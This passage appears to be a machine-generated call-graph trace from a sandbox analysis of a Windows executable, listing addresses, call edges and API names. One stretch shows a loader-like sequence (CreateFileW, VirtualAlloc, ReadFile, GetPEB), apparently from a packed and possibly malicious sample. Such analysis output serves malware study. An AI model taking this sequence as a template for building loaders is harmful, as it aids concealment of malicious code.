API calls 87483->87488 87484->87475 87489 420494 __lseeki64_nolock 48 API calls 87484->87489 87485->87471 87486->87477 87490 420494 __lseeki64_nolock 48 API calls 87487->87490 87488->87483 87489->87484 87491 41dde9 87490->87491 87491->87477 87492->87375 87493->87382 87494->87378 87495->87386 87496->87382 87497->87387 87498->87386 87499->87396 87500->87395 87501->87382 87503 416b04 __malloc_crt 46 API calls 87502->87503 87504 420618 87503->87504 87504->87405 87505->87402 87506->87410 87510 4148b3 GetSystemTimeAsFileTime __aulldiv 87507->87510 87509 442c6b 87509->87013 87510->87509 87511->87020 87512->87026 87513->87026 87519 45272f __tzset_nolock _wcscpy 87514->87519 87515 414d04 61 API calls __fread_nolock 87515->87519 87516 44afef GetSystemTimeAsFileTime 87516->87519 87517 4528a4 87517->86934 87517->86935 87518 4150d1 81 API calls _fseek 87518->87519 87519->87515 87519->87516 87519->87517 87519->87518 87521 44b1bc 87520->87521 87522 44b1ca 87520->87522 87523 4149c2 116 API calls 87521->87523 87524 44b1e1 87522->87524 87525 4149c2 116 API calls 87522->87525 87526 44b1d8 87522->87526 87523->87522 87555 4321a4 87524->87555 87527 44b2db 87525->87527 87526->86961 87527->87524 87529 44b2e9 87527->87529 87531 44b2f6 87529->87531 87534 414a46 __fcloseall 82 API calls 87529->87534 87530 44b224 87532 44b253 87530->87532 87533 44b228 87530->87533 87531->86961 87559 43213d 87532->87559 87536 44b235 87533->87536 87539 414a46 __fcloseall 82 API calls 87533->87539 87534->87531 87537 44b245 87536->87537 87540 414a46 __fcloseall 82 API calls 87536->87540 87537->86961 87538 44b25a 87541 44b260 87538->87541 87542 44b289 87538->87542 87539->87536 87540->87537 87544 44b26d 87541->87544 87546 414a46 __fcloseall 82 API calls 87541->87546 87569 44b0bf 87 API calls 87542->87569 87547 44b27d 87544->87547 87549 414a46 __fcloseall 82 API calls 87544->87549 87545 44b28f 87570 4320f8 46 API calls _free 87545->87570 87546->87544 87547->86961 87549->87547 87550 44b295 87551 44b2a2 87550->87551 87552 414a46 __fcloseall 82 API calls 87550->87552 87553 44b2b2 87551->87553 87554 414a46 __fcloseall 82 API calls 87551->87554 87552->87551 87553->86961 87554->87553 87556 4321cb 87555->87556 87558 4321b4 __tzset_nolock _memmove 87555->87558 87557 414d04 __fread_nolock 61 API calls 87556->87557 87557->87558 87558->87530 87560 4135bb _malloc 46 API calls 87559->87560 87561 432150 87560->87561 87562 4135bb _malloc 46 API calls 87561->87562 87563 432162 87562->87563 87564 4135bb _malloc 46 API calls 87563->87564 87565 432174 87564->87565 87567 432189 87565->87567 87571 4320f8 46 API calls _free 87565->87571 87567->87538 87568 432198 87568->87538 87569->87545 87570->87550 87571->87568 87572->86864 87573->86867 87574->86885 87575->86885 87576->86885 87577->86876 87578->86885 87579->86885 87580->86889 87581->86898 87582->86900 87583->86900 87633 410160 87584->87633 87586 41012f GetFullPathNameW 87587 410147 moneypunct 87586->87587 87587->86718 87589 4102cb SHGetDesktopFolder 87588->87589 87590 410333 _wcsncpy 87588->87590 87589->87590 87591 4102e0 _wcsncpy 87589->87591 87590->86722 87591->87590 87592 41031c SHGetPathFromIDListW 87591->87592 87592->87590 87594 425f4a 87593->87594 87595 4101bb 87593->87595 87598 4114ab __wcsicoll 58 API calls 87594->87598 87601 425f6e 87594->87601 87596 410160 52 API calls 87595->87596 87597 4101c7 87596->87597 87637 410200 52 API calls 2 library calls 87597->87637 87598->87594 87600 4101d6 87638 410200 52 API calls 2 library calls 87600->87638 87601->86724 87603 4101e9 87603->86724 87605 40f760 128 API calls 87604->87605 87606 40f584 87605->87606 87607 429335 87606->87607 87608 40f58c 87606->87608 87611 4528bd 118 API calls 87607->87611 87609 40f598 87608->87609 87610 429358 87608->87610 87663 4033c0 113 API calls 7 library calls 87609->87663 87664 434034 86 API calls _wprintf 87610->87664 87613 42934b 87611->87613 87616 429373 87613->87616 87617 42934f 87613->87617 87615 40f5b4 87615->86721 87620 4115d7 52 API calls 87616->87620 87619 431e58 82 API calls 87617->87619 87618 429369 87618->87616 87619->87610 87627 4293c5 moneypunct 87620->87627 87621 42959c 87622 413748 _free 46 API calls 87621->87622 87623 4295a5 87622->87623 87624 431e58 82 API calls 87623->87624 87625 4295b1 87624->87625 87627->87621 87630 401b10 52 API calls 87627->87630 87639 444af8 87627->87639 87642 44b41c 87627->87642 87649 402780 87627->87649 87657 4022d0 87627->87657 87665 44c7dd 64 API calls 3 library calls 87627->87665 87630->87627 87634 410167 _wcslen 87633->87634 87635 4115d7 52 API calls 87634->87635 87636 41017e _wcscpy 87635->87636 87636->87586 87637->87600 87638->87603 87640 4115d7 52 API calls 87639->87640 87641 444b27 _memmove 87640->87641 87641->87627 87643 44b429 87642->87643 87644 4115d7 52 API calls 87643->87644 87645 44b440 87644->87645 87646 44b45e 87645->87646 87647 401b10 52 API calls 87645->87647 87646->87627 87648 44b453 87647->87648 87648->87627 87650 402790 moneypunct _memmove 87649->87650 87651 402827 87649->87651 87652 4115d7 52 API calls 87650->87652 87653 4115d7 52 API calls 87651->87653 87654 402797 87652->87654 87653->87650 87655 4115d7 52 API calls 87654->87655 87656 4027bd 87654->87656 87655->87656 87656->87627 87658 4022e0 87657->87658 87660 40239d 87657->87660 87659 4115d7 52 API calls 87658->87659 87658->87660 87662 402320 moneypunct 87658->87662 87659->87662 87660->87627 87661 4115d7 52 API calls 87661->87662 87662->87660 87662->87661 87663->87615 87664->87618 87665->87627 87667 402417 87666->87667 87671 402539 moneypunct 87666->87671 87668 4115d7 52 API calls 87667->87668 87667->87671 87669 402443 87668->87669 87670 4115d7 52 API calls 87669->87670 87672 4024b4 87670->87672 87671->86728 87672->87671 87672->87672 87674 4022d0 52 API calls 87672->87674 87695 402880 87672->87695 87674->87672 87680 401566 87675->87680 87676 401794 87747 40e9a0 90 API calls 87676->87747 87679 4010a0 52 API calls 87679->87680 87680->87676 87680->87679 87681 40167a 87680->87681 87682 4017c0 87681->87682 87748 45e737 90 API calls 3 library calls 87681->87748 87682->86731 87684 40bc70 52 API calls 87683->87684 87693 40d451 87684->87693 87685 40d50f 87751 410600 52 API calls 87685->87751 87687 427c01 87752 45e737 90 API calls 3 library calls 87687->87752 87688 40e0a0 52 API calls 87688->87693 87690 401b10 52 API calls 87690->87693 87691 40d519 87691->86733 87693->87685 87693->87687 87693->87688 87693->87690 87693->87691 87749 40f310 53 API calls 87693->87749 87750 40d860 91 API calls 87693->87750 87696 4115d7 52 API calls 87695->87696 87697 4028b3 87696->87697 87698 4115d7 52 API calls 87697->87698 87704 4028c5 moneypunct _memmove 87698->87704 87699 402780 52 API calls 87700 402b1e moneypunct 87699->87700 87700->87672 87701 427d62 87703 403350 52 API calls 87701->87703 87717 427d6b 87703->87717 87704->87701 87705 402bb6 87704->87705 87706 402aeb moneypunct 87704->87706 87711 403350 52 API calls 87704->87711 87719 427fd5 87704->87719 87720 427f2c 87704->87720 87721 402780 52 API calls 87704->87721 87726 427fa5 87704->87726 87727 402f00 52 API calls 87704->87727 87728 428000 87704->87728 87730 4026f0 52 API calls 87704->87730 87736 4115d7 52 API calls 87704->87736 87737 4031b0 63 API calls 87704->87737 87739 402f80 92 API calls _memmove 87704->87739 87740 402280 52 API calls 87704->87740 87742 4013a0 52 API calls 87704->87742 87738 403060 53 API calls 87705->87738 87706->87699 87712 42802b moneypunct 87706->87712 87708 402bca 87709 427f63 87708->87709 87710 402bd4 87708->87710 87744 460879 92 API calls 3 library calls 87709->87744 87713 402780 52 API calls 87710->87713 87711->87704 87716 402bdf 87713->87716 87716->87672 87717->87720 87741 403020 52 API calls _memmove 87717->87741 87745 460879 92 API calls 3 library calls 87719->87745 87743 460879 92 API calls 3 library calls 87720->87743 87721->87704 87725 427fe4 87731 402780 52 API calls 87725->87731 87732 402780 52 API calls 87726->87732 87727->87704 87746 460879 92 API calls 3 library calls 87728->87746 87735 402a85 CharUpperBuffW 87730->87735 87734 427f48 87731->87734 87732->87700 87734->87700 87735->87704 87736->87704 87737->87704 87738->87708 87739->87704 87740->87704 87741->87717 87742->87704 87743->87734 87744->87734 87745->87725 87746->87700 87747->87681 87748->87682 87749->87693 87750->87693 87751->87691 87752->87691 87753->86746 87754->86747 87756 42c5fe 87755->87756 87771 4091c6 87755->87771 87757 40bc70 52 API calls 87756->87757 87756->87771 87758 42c64e InterlockedIncrement 87757->87758 87759 42c665 87758->87759 87764 42c697 87758->87764 87762 42c672 InterlockedDecrement Sleep InterlockedIncrement 87759->87762 87759->87764 87760 42c737 InterlockedDecrement 87761 42c74a 87760->87761 87765 408f40 VariantClear 87761->87765 87762->87759 87762->87764 87763 42c731 87763->87760 87764->87760 87764->87763 87913 408e80 87764->87913 87767 42c752 87765->87767 87926 410c60 VariantClear moneypunct 87767->87926 87771->86808 87772 42c6db 87773 402160 52 API calls 87772->87773 87774 42c6e5 87773->87774 87775 45340c 85 API calls 87774->87775 87776 42c6f1 87775->87776 87923 40d200 52 API calls 2 library calls 87776->87923 87778 42c6fb 87924 465124 53 API calls 87778->87924 87780 42c715 87781 42c76a 87780->87781 87782 42c719 87780->87782 87784 401b10 52 API calls 87781->87784 87925 46fe32 VariantClear 87782->87925 87785 42c77e 87784->87785 87786 401980 53 API calls 87785->87786 87793 42c796 87786->87793 87787 42c812 87928 46fe32 VariantClear 87787->87928 87789 42c82a InterlockedDecrement 87929 46ff07 54 API calls 87789->87929 87791 42c849 87795 42c9ec 87791->87795 87800 408f40 VariantClear 87791->87800 87807 401980 53 API calls 87791->87807 87809 402780 52 API calls 87791->87809 87932 40a780 87791->87932 87792 42c864 87930 45e737 90 API calls 3 library calls 87792->87930 87793->87787 87793->87792 87927 40ba10 52 API calls 2 library calls 87793->87927 87973 47d33e 338 API calls 87795->87973 87798 42c9fe 87974 46feb1 VariantClear VariantClear 87798->87974 87800->87791 87801 42ca08 87803 401b10 52 API calls 87801->87803 87802 408f40 VariantClear 87804 42c891 87802->87804 87805 42ca15 87803->87805 87931 410c60 VariantClear moneypunct 87804->87931 87808 40c2c0 52 API calls 87805->87808 87807->87791 87810 42c874 87808->87810 87809->87791 87810->87802 87812 42ca59 87810->87812 87812->87812 87814 40afc4 87813->87814 87815 40b156 87813->87815 87816 40afd5 87814->87816 87817 42d1e3 87814->87817 87985 45e737 90 API calls 3 library calls 87815->87985 87822 40a780 201 API calls 87816->87822 87838 40b11a moneypunct 87816->87838 87986 45e737 90 API calls 3 library calls 87817->87986 87820 42d1f8 87826 408f40 VariantClear 87820->87826 87821 40b143 87821->86808 87824 40b00a 87822->87824 87824->87820 87827 40b012 87824->87827 87825 42d4db 87825->87825 87826->87821 87828 40b04a 87827->87828 87829 42d231 VariantClear 87827->87829 87836 40b094 moneypunct 87827->87836 87832 40b05c moneypunct 87828->87832 87987 40e270 VariantClear moneypunct 87828->87987 87829->87832 87830 42d45a VariantClear 87830->87838 87831 40b108 87831->87838 87988 40e270 VariantClear moneypunct 87831->87988 87834 4115d7 52 API calls 87832->87834 87832->87836 87834->87836 87836->87831 87837 42d425 moneypunct 87836->87837 87837->87830 87837->87838 87838->87821 87989 45e737 90 API calls 3 library calls 87838->87989 87840 408fff 87839->87840 87853 40900d 87839->87853 87990 403ea0 52 API calls __cinit 87840->87990 87843 42c3f6 87993 45e737 90 API calls 3 library calls 87843->87993 87845 40a780 201 API calls 87845->87853 87846 42c44a 87995 45e737 90 API calls 3 library calls 87846->87995 87848 42c47b 87996 451b42 61 API calls 87848->87996 87850 42c4cb 87998 47faae 240 API calls 87850->87998 87851 42c564 87855 408f40 VariantClear 87851->87855 87853->87843 87853->87845 87853->87846 87853->87848 87853->87850 87853->87851 87856 42c548 87853->87856 87857 409112 87853->87857 87859 42c528 87853->87859 87862 4090df 87853->87862 87867 4090ea 87853->87867 87873 4090f2 moneypunct 87853->87873 87992 4534e3 52 API calls 87853->87992 87994 40c4e0 201 API calls 87853->87994 87855->87873 88001 45e737 90 API calls 3 library calls 87856->88001 87857->87856 87865 40912b 87857->87865 87858 42c491 87858->87873 87997 45e737 90 API calls 3 library calls 87858->87997 88000 45e737 90 API calls 3 library calls 87859->88000 87860 42c4da 87860->87873 87999 45e737 90 API calls 3 library calls 87860->87999 87862->87867 87868 408e80 VariantClear 87862->87868 87865->87873 87991 403e10 53 API calls 87865->87991 87869 408f40 VariantClear 87867->87869 87868->87867 87869->87873 87871 40914b 87872 408f40 VariantClear 87871->87872 87872->87873 87873->86808 88002 408d90 87874->88002 87876 429778 88031 410c60 VariantClear moneypunct 87876->88031 87878 429780 87879 408cf9 87879->87876 87880 42976c 87879->87880 87882 408d2d 87879->87882 88030 45e737 90 API calls 3 library calls 87880->88030 88018 403d10 87882->88018 87885 408d71 moneypunct 87885->86808 87886 408f40 VariantClear 87887 408d45 moneypunct 87886->87887 87887->87885 87887->87886 87888->86808 87889->86808 87890->86808 87891->86808 87892->86757 87893->86762 87894->86808 87895->86808 87896->86808 87897->86808 87898->86814 87899->86814 87900->86814 87901->86814 87902->86814 87903->86814 87904->86814 87906 403cdf 87905->87906 87907 408f40 VariantClear 87906->87907 87908 403ce7 87907->87908 87908->86802 87909->86814 87910->86814 87911->86808 87912->86754 87914 408e88 87913->87914 87916 408e94 87913->87916 87915 408f40 VariantClear 87914->87915 87915->87916 87917 45340c 87916->87917 87918 453439 87917->87918 87919 453419 87917->87919 87918->87772 87920 45342f 87919->87920 87975 4531b1 85 API calls 5 library calls 87919->87975 87920->87772 87922 453425 87922->87772 87923->87778 87924->87780 87925->87763 87926->87771 87927->87793 87928->87789 87929->87791 87930->87810 87931->87771 87933 40a7a6 87932->87933 87934 40ae8c 87932->87934 87936 4115d7 52 API calls 87933->87936 87976 41130a 51 API calls __cinit 87934->87976 87971 40a7c6 moneypunct _memmove 87936->87971 87937 40a86d 87939 40a878 moneypunct 87937->87939 87948 40abd1 87937->87948 87938 408e80 VariantClear 87938->87971 87945 408f40 VariantClear 87939->87945 87951 40a884 moneypunct 87939->87951 87940 401b10 52 API calls 87940->87971 87942 40bc10 53 API calls 87942->87971 87943 42b791 VariantClear 87943->87971 87944 42ba2d VariantClear 87944->87971 87945->87939 87946 40e270 VariantClear 87946->87971 87947 42b459 VariantClear 87947->87971 87981 45e737 90 API calls 3 library calls 87948->87981 87950 408cc0 194 API calls 87950->87971 87951->87791 87952 42b6f6 VariantClear 87952->87971 87953 4530c9 VariantClear 87953->87971 87954 42bc5b 87954->87791 87955 42bbf5 87982 45e737 90 API calls 3 library calls 87955->87982 87956 4115d7 52 API calls 87956->87971 87957 40b5f0 89 API calls 87957->87971 87959 4115d7 52 API calls 87960 42b5b3 VariantInit VariantCopy 87959->87960 87964 42b5d7 VariantClear 87960->87964 87960->87971 87962 42bb6a 87984 44b92d VariantClear 87962->87984 87963 408f40 VariantClear 87963->87971 87964->87971 87967 42bc37 87983 45e737 90 API calls 3 library calls 87967->87983 87970 42bc48 87970->87962 87972 408f40 VariantClear 87970->87972 87971->87937 87971->87938 87971->87940 87971->87942 87971->87943 87971->87944 87971->87946 87971->87947 87971->87948 87971->87950 87971->87952 87971->87953 87971->87955 87971->87956 87971->87957 87971->87959 87971->87962 87971->87963 87971->87967 87977 45308a 53 API calls 87971->87977 87978 470870 52 API calls 87971->87978 87979 457f66 87 API calls __write_nolock 87971->87979 87980 472f47 127 API calls 87971->87980 87972->87962 87973->87798 87974->87801 87975->87922 87976->87971 87977->87971 87978->87971 87979->87971 87980->87971 87981->87962 87982->87962 87983->87970 87984->87954 87985->87817 87986->87820 87987->87832 87988->87838 87989->87825 87990->87853 87991->87871 87992->87853 87993->87873 87994->87853 87995->87873 87996->87858 87997->87873 87998->87860 87999->87873 88000->87873 88001->87851 88003 4289d2 88002->88003 88004 408db3 88002->88004 88034 45e737 90 API calls 3 library calls 88003->88034 88032 40bec0 90 API calls 88004->88032 88007 408dc9 88008 4289e5 88007->88008 88011 428a05 88007->88011 88013 40a780 201 API calls 88007->88013 88014 408e64 88007->88014 88016 408f40 VariantClear 88007->88016 88017 408e5a 88007->88017 88033 40ba10 52 API calls 2 library calls 88007->88033 88035 45e737 90 API calls 3 library calls 88008->88035 88012 408f40 VariantClear 88011->88012 88012->88017 88013->88007 88015 408f40 VariantClear 88014->88015 88015->88017 88016->88007 88017->87879 88019 408f40 VariantClear 88018->88019 88020 403d20 88019->88020 88021 403cd0 VariantClear 88020->88021 88022 403d4d 88021->88022 88036 46e91c 88022->88036 88039 4813fa 88022->88039 88049 45e17d 88022->88049 88059 40de10 88022->88059 88064 467897 88022->88064 88108 4755ad 88022->88108 88023 403d76 88023->87876 88023->87887 88030->87876 88031->87878 88032->88007 88033->88007 88034->88008 88035->88011 88111 46e785 88036->88111 88038 46e92f 88038->88023 88040 45340c 85 API calls 88039->88040 88041 481438 88040->88041 88042 402880 95 API calls 88041->88042 88043 48143f 88042->88043 88044 481465 88043->88044 88045 40a780 201 API calls 88043->88045 88048 481469 88044->88048 88214 40e710 53 API calls 88044->88214 88045->88044 88047 4814a4 88047->88023 88048->88023 88050 45e198 88049->88050 88051 45e19c 88050->88051 88052 45e1b8 88050->88052 88053 408f40 VariantClear 88051->88053 88054 45e1cc 88052->88054 88055 45e1db FindClose 88052->88055 88056 45e1a4 88053->88056 88057 45e1d9 moneypunct 88054->88057 88058 44ae3e CloseHandle 88054->88058 88055->88057 88056->88023 88057->88023 88058->88057 88060 4115d7 52 API calls 88059->88060 88061 40de23 88060->88061 88062 40da20 CloseHandle 88061->88062 88063 40de2e 88062->88063 88063->88023 88065 4678bb 88064->88065 88067 45340c 85 API calls 88065->88067 88100 467954 88065->88100 88066 4115d7 52 API calls 88068 467989 88066->88068 88069 4678f6 88067->88069 88070 467995 88068->88070 88218 40da60 53 API calls 88068->88218 88071 413a0e __wsplitpath 46 API calls 88069->88071 88073 4533eb 85 API calls 88070->88073 88074 4678fc 88071->88074 88075 4679b7 88073->88075 88076 401b10 52 API calls 88074->88076 88077 40de40 60 API calls 88075->88077 88078 46790c 88076->88078 88079 4679c3 88077->88079 88215 40d200 52 API calls 2 library calls 88078->88215 88081 4679c7 GetLastError 88079->88081 88088 467a05 88079->88088 88083 403cd0 VariantClear 88081->88083 88082 467917 88082->88100 88216 4339fa GetFileAttributesW FindFirstFileW FindClose 88082->88216 88086 4679dc 88083->88086 88084 467a2c 88089 4115d7 52 API calls 88084->88089 88085 467a4b 88090 4115d7 52 API calls 88085->88090 88091 4679e6 88086->88091 88096 44ae3e CloseHandle 88086->88096 88088->88084 88088->88085 88094 467a31 88089->88094 88095 467a49 88090->88095 88098 408f40 VariantClear 88091->88098 88092 467928 88097 46792f 88092->88097 88092->88100 88093 467964 88093->88023 88219 436299 52 API calls 2 library calls 88094->88219 88103 408f40 VariantClear 88095->88103 88096->88091 88217 4335cd 56 API calls 3 library calls 88097->88217 88102 4679ed 88098->88102 88100->88066 88100->88093 88102->88023 88105 467a88 88103->88105 88104 467939 88104->88100 88106 408f40 VariantClear 88104->88106 88105->88023 88107 467947 88106->88107 88107->88100 88220 475077 88108->88220 88110 4755c0 88110->88023 88112 46e7a2 88111->88112 88113 46e802 88112->88113 88114 4115d7 52 API calls 88112->88114 88117 46e7e5 88113->88117 88124 46e82f 88113->88124 88115 46e7ad 88114->88115 88116 46e7b9 88115->88116 88159 40da60 53 API calls 88115->88159 88160 4533eb 88116->88160 88119 408f40 VariantClear 88117->88119 88121 46e7ea 88119->88121 88121->88038 88123 46e8b5 88152 4680ed 88123->88152 88124->88123 88127 46e845 88124->88127 88130 4533eb 85 API calls 88127->88130 88129 46e8bb 88156 443fbe 88129->88156 88139 46e84b 88130->88139 88131 46e7db 88131->88117 88176 44ae3e 88131->88176 88132 46e87a 88179 4689f4 59 API calls 88132->88179 88136 46e883 88180 4013c0 52 API calls 88136->88180 88139->88132 88139->88136 88140 46e88f 88142 40e0a0 52 API calls 88140->88142 88141 408f40 VariantClear 88151 46e881 88141->88151 88143 46e899 88142->88143 88181 40d200 52 API calls 2 library calls 88143->88181 88145 46e911 88145->88038 88146 46e8a5 88182 4689f4 59 API calls 88146->88182 88149 46e903 88150 44ae3e CloseHandle 88149->88150 88150->88145 88151->88145 88183 40da20 88151->88183 88153 468100 88152->88153 88154 4680fa 88152->88154 88153->88129 88187 467ac4 55 API calls 2 library calls 88154->88187 88188 443e36 88156->88188 88158 443fd3 88158->88141 88158->88151 88159->88116 88161 453404 88160->88161 88162 4533f8 88160->88162 88164 40de40 88161->88164 88162->88161 88195 4531b1 85 API calls 5 library calls 88162->88195 88165 40da20 CloseHandle 88164->88165 88166 40de4e 88165->88166 88196 40f110 88166->88196 88169 4264fa 88171 40de84 88205 40e080 SetFilePointerEx SetFilePointerEx 88171->88205 88173 40de8b 88206 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88173->88206 88175 40de90 88175->88124 88175->88131 88177 44ae4b moneypunct 88176->88177 88208 443fdf 88176->88208 88177->88117 88179->88151 88180->88140 88181->88146 88182->88151 88184 40da37 88183->88184 88185 40da29 88183->88185 88184->88185 88186 40da3c CloseHandle 88184->88186 88185->88149 88186->88149 88187->88153 88191 443e19 88188->88191 88192 443e26 88191->88192 88193 443e32 WriteFile 88191->88193 88194 443db4 SetFilePointerEx SetFilePointerEx 88192->88194 88193->88158 88194->88193 88195->88161 88197 40f125 CreateFileW 88196->88197 88198 42630c 88196->88198 88200 40de74 88197->88200 88199 426311 CreateFileW 88198->88199 88198->88200 88199->88200 88201 426337 88199->88201 88200->88169 88204 40dea0 55 API calls moneypunct 88200->88204 88207 40df90 SetFilePointerEx SetFilePointerEx 88201->88207 88203 426342 88203->88200 88204->88171 88205->88173 88206->88175 88207->88203 88209 40da20 CloseHandle 88208->88209 88210 443feb 88209->88210 88213 4340db CloseHandle moneypunct 88210->88213 88212 444001 88212->88177 88213->88212 88214->88047 88215->88082 88216->88092 88217->88104 88218->88070 88219->88095 88221 4533eb 85 API calls 88220->88221 88222 4750b8 88221->88222 88223 4750ee 88222->88223 88224 475129 88222->88224 88226 408f40 VariantClear 88223->88226 88273 4646e0 88224->88273 88231 4750f5 88226->88231 88227 47515e 88228 475162 88227->88228 88255 47518e 88227->88255 88229 408f40 VariantClear 88228->88229 88249 475169 88229->88249 88230 475357 88232 475365 88230->88232 88233 4754ea 88230->88233 88231->88110 88307 44b3ac 57 API calls 88232->88307 88313 464812 92 API calls 88233->88313 88237 4754fc 88238 475374 88237->88238 88239 475508 88237->88239 88286 430d31 88238->88286 88241 408f40 VariantClear 88239->88241 88240 4533eb 85 API calls 88240->88255 88244 47550f 88241->88244 88244->88249 88245 475388 88293 4577e9 88245->88293 88247 47539e 88301 410cfc 88247->88301 88248 475480 88251 408f40 VariantClear 88248->88251 88249->88110 88251->88249 88253 4753d4 88309 40e830 53 API calls 88253->88309 88254 4753b8 88308 45e737 90 API calls 3 library calls 88254->88308 88255->88230 88255->88240 88255->88248 88259 4754b5 88255->88259 88305 436299 52 API calls 2 library calls 88255->88305 88306 463ad5 64 API calls __wcsicoll 88255->88306 88258 4753c5 GetCurrentProcess TerminateProcess 88258->88253 88260 408f40 VariantClear 88259->88260 88260->88249 88261 4753e3 88271 475406 88261->88271 88310 40cf00 53 API calls 88261->88310 88263 475556 88263->88249 88267 47556e FreeLibrary 88263->88267 88264 4753f8 88311 46c43e 106 API calls 2 library calls 88264->88311 88267->88249 88269 408e80 VariantClear 88269->88271 88271->88263 88271->88269 88272 408f40 VariantClear 88271->88272 88312 40cf00 53 API calls 88271->88312 88314 44b3ac 57 API calls 88271->88314 88315 46c43e 106 API calls 2 library calls 88271->88315 88272->88271 88316 4536f7 53 API calls 88273->88316 88275 4646fc 88317 4426cd 59 API calls _wcslen 88275->88317 88277 464711 88279 40bc70 52 API calls 88277->88279 88285 46474b 88277->88285 88280 46472c 88279->88280 88318 461465 52 API calls _memmove 88280->88318 88282 464741 88283 40c600 52 API calls 88282->88283 88283->88285 88284 464793 88284->88227 88285->88284 88319 463ad5 64 API calls __wcsicoll 88285->88319 88287 430db2 88286->88287 88288 430d54 88286->88288 88287->88245 88289 4115d7 52 API calls 88288->88289 88290 430d74 88289->88290 88291 430da9 88290->88291 88292 4115d7 52 API calls 88290->88292 88291->88245 88292->88290 88294 457a84 88293->88294 88296 45780c _strcat moneypunct _wcslen _wcscpy 88293->88296 88294->88247 88295 45340c 85 API calls 88295->88296 88296->88294 88296->88295 88297 443006 57 API calls 88296->88297 88299 4135bb 46 API calls _malloc 88296->88299 88300 40f6f0 54 API calls 88296->88300 88320 44b3ac 57 API calls 88296->88320 88297->88296 88299->88296 88300->88296 88303 410d11 88301->88303 88302 410da9 VirtualProtect 88304 410d77 88302->88304 88303->88302 88303->88304 88304->88253 88304->88254 88305->88255 88306->88255 88307->88238 88308->88258 88309->88261 88310->88264 88311->88271 88312->88271 88313->88237 88314->88271 88315->88271 88316->88275 88317->88277 88318->88282 88319->88284 88320->88296 88321 42d154 88325 480a8d 88321->88325 88323 42d161 88324 480a8d 201 API calls 88323->88324 88324->88323 88326 480ae4 88325->88326 88327 480b26 88325->88327 88328 480aeb 88326->88328 88329 480b15 88326->88329 88330 40bc70 52 API calls 88327->88330 88331 480aee 88328->88331 88332 480b04 88328->88332 88358 4805bf 201 API calls 88329->88358 88352 480b2e 88330->88352 88331->88327 88334 480af3 88331->88334 88357 47fea2 201 API calls __itow_s 88332->88357 88356 47f135 201 API calls 88334->88356 88336 40e0a0 52 API calls 88336->88352 88339 408f40 VariantClear 88341 481156 88339->88341 88340 480aff 88340->88339 88342 408f40 VariantClear 88341->88342 88343 48115e 88342->88343 88343->88323 88344 480ff5 88364 45e737 90 API calls 3 library calls 88344->88364 88345 40e710 53 API calls 88345->88352 88346 401980 53 API calls 88346->88352 88348 40c2c0 52 API calls 88348->88352 88349 40a780 201 API calls 88349->88352 88350 408e80 VariantClear 88350->88352 88352->88336 88352->88340 88352->88344 88352->88345 88352->88346 88352->88348 88352->88349 88352->88350 88359 45377f 52 API calls 88352->88359 88360 45e951 53 API calls 88352->88360 88361 40e830 53 API calls 88352->88361 88362 47925f 53 API calls 88352->88362 88363 47fcff 201 API calls 88352->88363 88356->88340 88357->88340 88358->88340 88359->88352 88360->88352 88361->88352 88362->88352 88363->88352 88364->88340 88365 420b438 88379 4209088 88365->88379 88367 420b4db 88382 420b328 88367->88382 88369 420b504 CreateFileW 88371 420b558 88369->88371 88378 420b553 88369->88378 88372 420b56f VirtualAlloc 88371->88372 88371->88378 88373 420b590 ReadFile 88372->88373 88372->88378 88374 420b5ab 88373->88374 88373->88378 88375 420a0f8 12 API calls 88374->88375 88376 420b5c5 88375->88376 88377 420a328 GetPEB GetPEB 88376->88377 88377->88378 88381 4209713 88379->88381 88385 420c528 GetPEB 88379->88385 88381->88367 88383 420b331 Sleep 88382->88383 88384 420b33f 88383->88384 88385->88381 88386 425b2b 88391 40f000 88386->88391 88390 425b3a 88392 4115d7 52 API calls 88391->88392 88393 40f007 88392->88393 88394 4276ea 88393->88394 88400 40f030 88393->88400 88399 41130a 51 API calls __cinit 88399->88390 88401 40f039 88400->88401 88403 40f01a 88400->88403 88430 41130a 51 API calls __cinit 88401->88430 88404 40e500 88403->88404 88405 40bc70 52 API calls 88404->88405 88406 40e515 GetVersionExW 88405->88406 88407 402160 52 API calls 88406->88407 88408 40e557 88407->88408 88431 40e660 88408->88431 88415 427674 88418 4276c6 GetSystemInfo 88415->88418 88416 40e5e0 88420 4276d5 GetSystemInfo 88416->88420 88445 40efd0 88416->88445 88417 40e5cd GetCurrentProcess 88452 40ef20 LoadLibraryA GetProcAddress 88417->88452 88418->88420 88423 40e629 88449 40ef90 88423->88449 88426 40e641 FreeLibrary 88427 40e644 88426->88427 88428 40e653 FreeLibrary 88427->88428 88429 40e656 88427->88429 88428->88429 88429->88399 88430->88403 88432 40e667 88431->88432 88433 42761d 88432->88433 88434 40c600 52 API calls 88432->88434 88435 40e55c 88434->88435 88436 40e680 88435->88436 88437 40e687 88436->88437 88438 427616 88437->88438 88439 40c600 52 API calls 88437->88439 88440 40e566 88439->88440 88440->88415 88441 40ef60 88440->88441 88442 40e5c8 88441->88442 88443 40ef66 LoadLibraryA 88441->88443 88442->88416 88442->88417 88443->88442 88444 40ef77 GetProcAddress 88443->88444 88444->88442 88446 40e620 88445->88446 88447 40efd6 LoadLibraryA 88445->88447 88446->88418 88446->88423 88447->88446 88448 40efe7 GetProcAddress 88447->88448 88448->88446 88453 40efb0 LoadLibraryA GetProcAddress 88449->88453 88451 40e632 GetNativeSystemInfo 88451->88426 88451->88427 88452->88416 88453->88451 88454 425b5e 88459 40c7f0 88454->88459 88458 425b6d 88494 40db10 52 API calls 88459->88494 88461 40c82a 88495 410ab0 6 API calls 88461->88495 88463 40c86d 88464 40bc70 52 API calls 88463->88464 88465 40c877 88464->88465 88466 40bc70 52 API calls 88465->88466 88467 40c881 88466->88467 88468 40bc70 52 API calls 88467->88468 88469 40c88b 88468->88469 88470 40bc70 52 API calls 88469->88470 88471 40c8d1 88470->88471 88472 40bc70 52 API calls 88471->88472 88473 40c991 88472->88473 88496 40d2c0 52 API calls 88473->88496 88475 40c99b 88497 40d0d0 53 API calls 88475->88497 88477 40c9c1 88478 40bc70 52 API calls 88477->88478 88479 40c9cb 88478->88479 88498 40e310 53 API calls 88479->88498 88481 40ca28 88482 408f40 VariantClear 88481->88482 88483 40ca30 88482->88483 88484 408f40 VariantClear 88483->88484 88485 40ca38 GetStdHandle 88484->88485 88486 429630 88485->88486 88487 40ca87 88485->88487 88486->88487 88488 429639 88486->88488 88493 41130a 51 API calls __cinit 88487->88493 88499 4432c0 57 API calls 88488->88499 88490 429641 88500 44b6ab CreateThread 88490->88500 88492 42964f CloseHandle 88492->88487 88493->88458 88494->88461 88495->88463 88496->88475 88497->88477 